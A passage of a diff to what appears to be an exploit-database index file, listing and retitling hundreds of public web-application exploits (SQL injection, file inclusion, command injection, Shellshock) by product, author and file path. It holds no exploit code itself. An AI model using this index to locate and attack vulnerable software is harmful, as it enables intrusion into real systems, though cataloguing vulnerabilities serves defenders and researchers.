Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 -12340,platforms/php/webapps/12340.txt,"Joomla! Component com_caddy - Exploit",2010-04-22,_SuBz3r0_,php,webapps,0 12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injections",2010-04-22,v3n0m,php,webapps,0 12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0 @@ -24001,7 +24001,7 @@ id,file,description,date,author,platform,type,port 12659,platforms/php/webapps/12659.txt,"DB[CMS] - 'section.php' SQL Injection",2010-05-19,CoBRa_21,php,webapps,0 12660,platforms/hardware/webapps/12660.txt,"Palo Alto Network Vulnerability - Cross-Site Scripting",2010-05-19,"Jeromie Jackson",hardware,webapps,0 12661,platforms/php/webapps/12661.txt,"DBCart - 'article.php' SQL Injection",2010-05-19,v3n0m,php,webapps,0 -12664,platforms/asp/webapps/12664.txt,"Renista CMS - Exploit",2010-05-20,"Amir Afghanian",asp,webapps,0 +12664,platforms/asp/webapps/12664.txt,"Renista CMS - SQL Injection",2010-05-20,"Amir Afghanian",asp,webapps,0 12665,platforms/php/webapps/12665.pl,"IMEDIA - 'index.php' SQL Injection",2010-05-20,kannibal615,php,webapps,0 12666,platforms/php/webapps/12666.txt,"DB[CMS] - 'article.php' SQL Injection",2010-05-20,blackraptor,php,webapps,0 12667,platforms/php/webapps/12667.py,"Entry Level Content Management System (EL CMS) - SQL Injection",2010-05-20,vir0e5,php,webapps,0 @@ -24193,7 +24193,7 @@ id,file,description,date,author,platform,type,port 13803,platforms/php/webapps/13803.txt,"PHPAccess - SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13804,platforms/php/webapps/13804.txt,"Joomla! Component com_jnewsletter - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13805,platforms/php/webapps/13805.txt,"PHP Property Rental Script - SQL Injection / Cross-Site Scripting",2010-06-09,"L0rd CrusAd3r",php,webapps,0 -13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0 +13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x < 1.4.x - SQL Injection",2010-06-09,TinKode,php,webapps,0 13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0 13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQL Injection / Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0 13813,platforms/php/webapps/13813.html,"Store Locator - Cross-Site Request Forgery (Add Admin)",2010-06-10,JaMbA,php,webapps,0 @@ -24346,7 +24346,7 @@ id,file,description,date,author,platform,type,port 14054,platforms/php/webapps/14054.txt,"Joomla! Component jesubmit 1.4 - SQL Injection",2010-06-25,"L0rd CrusAd3r",php,webapps,0 14055,platforms/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 -14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Exploit",2010-06-26,sebug,php,webapps,0 +14057,platforms/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting",2010-06-26,sebug,php,webapps,0 14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla! Component JE Media Player - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 @@ -25539,7 +25539,7 @@ id,file,description,date,author,platform,type,port 17344,platforms/php/webapps/17344.txt,"Invisionix Roaming System Remote metasys 0.2 - Local File Inclusion",2011-05-29,"Treasure Priyamal",php,webapps,0 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload",2011-05-30,"Treasure Priyamal",php,webapps,0 17347,platforms/php/webapps/17347.php,"Easy Media Script - SQL Injection",2011-05-30,Lagripe-Dz,php,webapps,0 -17349,platforms/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Exploit",2011-05-30,Aodrulez,hardware,webapps,0 +17349,platforms/hardware/webapps/17349.txt,"Belkin F5D7234-4 v5 G Wireless Router - Remote Hash Exposed",2011-05-30,Aodrulez,hardware,webapps,0 17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injections",2011-05-30,v3n0m,php,webapps,0 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection",2011-06-04,rgod,windows,webapps,0 17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0 @@ -26002,7 +26002,7 @@ id,file,description,date,author,platform,type,port 18392,platforms/php/webapps/18392.php,"appRain CMF 0.1.5 - 'Uploadify.php' Unrestricted Arbitrary File Upload",2012-01-19,EgiX,php,webapps,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance - Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage - SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 -18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 +18396,platforms/php/webapps/18396.sh,"WhatsApp - Remote Change Status",2012-01-20,emgent,php,webapps,0 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code Injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS - Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 18404,platforms/php/webapps/18404.pl,"iSupport 1.x - Cross-Site Request Forgery / HTML Code Injection (Add Admin)",2012-01-21,Or4nG.M4N,php,webapps,0 @@ -26732,7 +26732,7 @@ id,file,description,date,author,platform,type,port 21896,platforms/php/webapps/21896.txt,"Midicart PHP - Arbitrary File Upload",2002-10-02,frog,php,webapps,0 21899,platforms/php/webapps/21899.txt,"phpWebSite 0.8.3 - 'article.php' Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 - PHP Injection",2002-10-02,frog,php,webapps,0 -21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password",2002-10-02,frog,php,webapps,0 +21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remote Readable Administrator Password",2002-10-02,frog,php,webapps,0 21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module - Cross-Site Scripting",2002-10-03,Pistone,php,webapps,0 21905,platforms/php/webapps/21905.txt,"phpMyNewsletter 0.6.10 - Remote File Inclusion",2002-10-03,frog,php,webapps,0 21906,platforms/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2002-10-04,Sp.IC,php,webapps,0 @@ -27068,7 +27068,7 @@ id,file,description,date,author,platform,type,port 22778,platforms/asp/webapps/22778.txt,"Snitz Forums 2000 3.4.03 - 'search.asp' Cross-Site Scripting",2003-06-16,JeiAr,asp,webapps,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - 'move_messages.php' Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 Administrator Plugin - 'options.php' Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 -22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0 +22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Multiple Vulnerabilities",2003-06-17,dr_insane,php,webapps,0 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 @@ -27602,6 +27602,7 @@ id,file,description,date,author,platform,type,port 24100,platforms/php/webapps/24100.txt,"Adam Webb NukeJokes 1.7/2.0 Module - 'modules.php?jokeid' SQL Injection",2004-05-08,"Janek Vind",php,webapps,0 24104,platforms/php/webapps/24104.txt,"Tutorials Manager 1.0 - Multiple SQL Injections",2004-05-10,"Hillel Himovich",php,webapps,0 24108,platforms/php/webapps/24108.txt,"phpShop 2.0 - SQL Injection",2013-01-14,"By onestree",php,webapps,0 +43146,platforms/hardware/webapps/43146.txt,"D-Link DCS-936L Network Camera - Cross-Site Request Forgery",2017-03-26,SlidingWindow,hardware,webapps,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 @@ -28374,8 +28375,8 @@ id,file,description,date,author,platform,type,port 25529,platforms/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,asp,webapps,0 25530,platforms/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,asp,webapps,0 25531,platforms/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",php,webapps,0 -25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 -25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 +25532,platforms/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Remote File Inclusion",2005-04-24,"James Bercegay",php,webapps,0 +25533,platforms/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Cross-Site Scripting",2005-04-24,"James Bercegay",php,webapps,0 25534,platforms/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,php,webapps,0 25535,platforms/php/webapps/25535.txt,"Invision Power Board 2.0.1 - 'QPid' SQL Injection",2005-04-26,SVT,php,webapps,0 25536,platforms/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - 'IntProdID' SQL Injection",2005-04-26,Dcrab,asp,webapps,0 @@ -28981,7 +28982,7 @@ id,file,description,date,author,platform,type,port 26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0 26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,rgod,php,webapps,0 26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0 -26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 +26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0 26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - 'lostpwd.php?nick' SQL Injection",2005-10-08,rgod,php,webapps,0 26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - 'newmsg.php?fid' SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0 26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php?t_login' Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0 @@ -29106,7 +29107,7 @@ id,file,description,date,author,platform,type,port 26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum - 'ForumAuthDetails.php?AuthID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum - 'forumreply.php?TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 -26505,platforms/php/webapps/26505.txt,"Codegrrl - 'Protection.php' Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 +26505,platforms/php/webapps/26505.txt,"Codegrrl - 'Protection.php' Code Execution",2005-11-14,"Robin Verton",php,webapps,0 26506,platforms/cgi/webapps/26506.txt,"Walla TeleSite 3.0 - 'ts.exe?tsurl' Arbitrary Article Access",2005-11-15,"Rafi Nahum",cgi,webapps,0 26507,platforms/cgi/webapps/26507.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' Cross-Site Scripting",2005-11-15,"Rafi Nahum",cgi,webapps,0 26508,platforms/cgi/webapps/26508.txt,"Walla TeleSite 3.0 - 'ts.exe?sug' SQL Injection",2005-11-15,"Rafi Nahum",cgi,webapps,0 @@ -30763,8 +30764,8 @@ id,file,description,date,author,platform,type,port 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 28719,platforms/php/webapps/28719.txt,"Joomla! Component VirtueMart Joomla! eCommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 28720,platforms/php/webapps/28720.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (2)",2006-09-27,ThE-WoLf-KsA,php,webapps,0 -28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 -28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - 'process_login.php' Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 +28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 +28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - 'process_login.php' Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 28723,platforms/php/webapps/28723.txt,"Aanval 7.1 build 70151 - Multiple Vulnerabilities",2013-10-04,xistence,php,webapps,80 28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 - 'Sig.php' Remote File Inclusion",2006-10-02,r0ut3r,php,webapps,0 28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner - 'functions.php' Remote File Inclusion",2006-10-02,"abu ahmed",php,webapps,0 @@ -31190,7 +31191,7 @@ id,file,description,date,author,platform,type,port 29303,platforms/php/webapps/29303.txt,"PHPBuilder 0.0.2 - 'HTM2PHP.php' Directory Traversal",2006-11-08,"the master",php,webapps,0 29304,platforms/php/webapps/29304.txt,"Calacode @Mail Webmail 4.51 - Filtering Engine HTML Injection",2006-12-20,"Philippe C. Caturegli",php,webapps,0 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 -29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 +29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.jsp Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 - 'add_comment.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps,0 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 @@ -31311,7 +31312,7 @@ id,file,description,date,author,platform,type,port 29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 - 'tell_friend.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - 'AdminLien.php' Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 -29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 +29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 29468,platforms/php/webapps/29468.txt,"Jax Petition Book 3.06 - 'jax_petitionbook.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 29469,platforms/php/webapps/29469.txt,"Jax Petition 3.06 Book - 'smileys.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps,0 @@ -31339,7 +31340,7 @@ id,file,description,date,author,platform,type,port 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Exploit",2007-05-14,"David Kierznowski",php,webapps,0 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - '/view/search/?path' Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",php,webapps,0 @@ -31766,7 +31767,7 @@ id,file,description,date,author,platform,type,port 30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - 'Archives.php' SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 -30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 +30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 30216,platforms/cfm/webapps/30216.txt,"FuseTalk 4.0 - 'AuthError.cfm' Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0 30217,platforms/php/webapps/30217.txt,"Wrapper.php for osCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",php,webapps,0 30220,platforms/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,php,webapps,0 @@ -31852,7 +31853,7 @@ id,file,description,date,author,platform,type,port 30793,platforms/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",asp,webapps,0 30794,platforms/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,asp,webapps,0 30375,platforms/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,ios,webapps,0 -30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - Exploit",2013-12-16,"Matt O'Connor",hardware,webapps,0 +30358,platforms/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",hardware,webapps,0 30792,platforms/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access",2007-11-21,D4m14n,php,webapps,0 30356,platforms/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",php,webapps,0 30415,platforms/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -32093,7 +32094,7 @@ id,file,description,date,author,platform,type,port 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - 'download.jsp?name' Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0 -30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 +30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - 'Component/upload.jsp' Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - 'index.asp' SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0 30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - 'Page.asp' SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0 @@ -32138,7 +32139,7 @@ id,file,description,date,author,platform,type,port 30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 -30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injections",2008-01-03,The:Paradox,php,webapps,0 +30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple SQL Injections",2008-01-03,The:Paradox,php,webapps,0 30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - '/wp-admin/post.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30786,platforms/php/webapps/30786.txt,"Middle School Homework Page 1.3 Beta 1 - Multiple Vulnerabilities",2014-01-07,AtT4CKxT3rR0r1ST,php,webapps,80 30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80 @@ -32916,7 +32917,7 @@ id,file,description,date,author,platform,type,port 32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32010,platforms/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps,0 32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0 -32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 +32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' SQL Injection",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 @@ -34220,7 +34221,7 @@ id,file,description,date,author,platform,type,port 34367,platforms/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",php,webapps,0 34370,platforms/jsp/webapps/34370.txt,"SAP NetWeaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 - SQL Injection / Cross-Site Scripting",2010-07-25,MustLive,php,webapps,0 -34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection",2010-07-26,nag_sunny,php,webapps,0 +34374,platforms/php/webapps/34374.txt,"Joomla! Component FreiChat 1.0/2.x - HTML Injection",2010-07-26,nag_sunny,php,webapps,0 34376,platforms/asp/webapps/34376.txt,"e-Courier CMS - 'UserGUID' Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,BugsNotHugs,asp,webapps,0 34377,platforms/php/webapps/34377.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities (2)",2010-10-04,Abysssec,php,webapps,0 34378,platforms/php/webapps/34378.txt,"Clixint Technologies DPI - Cross-Site Scripting",2009-12-04,anonymous,php,webapps,0 @@ -34581,7 +34582,7 @@ id,file,description,date,author,platform,type,port 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' Cross-Site Scripting",2009-07-20,"599eme Man",php,webapps,0 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now (Multiple Products) - 'bios.php?rank' SQL Injection",2009-07-20,"599eme Man",php,webapps,0 -34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Code Execution (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 +34895,platforms/cgi/webapps/34895.rb,"Bash CGI - Remote Command Injection (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34922,platforms/php/webapps/34922.txt,"WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 35024,platforms/php/webapps/35024.txt,"Joomla! Component Catalogue - SQL Injection / Local File Inclusion",2010-11-30,XroGuE,php,webapps,0 @@ -34741,7 +34742,7 @@ id,file,description,date,author,platform,type,port 35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' SQL Injection",2010-12-28,"non customers",php,webapps,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 -35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 +35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Command Injection (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 